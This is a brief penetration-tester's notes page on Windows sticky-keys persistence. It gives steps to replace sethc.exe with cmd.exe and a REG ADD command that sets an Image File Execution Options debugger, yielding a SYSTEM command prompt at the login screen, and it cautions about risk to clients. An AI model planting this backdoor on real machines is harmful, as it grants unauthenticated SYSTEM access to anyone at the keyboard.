02-Persistence, 02-Kiosk Break Out
Copying sethc.exe
Once you already have administrative access you can easily install sticky keys based persistence by performing the following:
- Make a copy of
sethc.exe
- Copy cmd.exe to C:\Windows\System32\sethc.exe
- Reboot and hit shift 5 times!
Registry Key
Another method is by leveraging registry keys running the following command:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
- If you use sticky keys for persistence any user can hit shift five times and get command prompt running as SYSTEM. BE CAREFUL!!! You shouldn’t introduce risks to your clients
Resources:
Title | URL |
---|---|
place | holder |
Also Check Out:
- PLACEHOLDER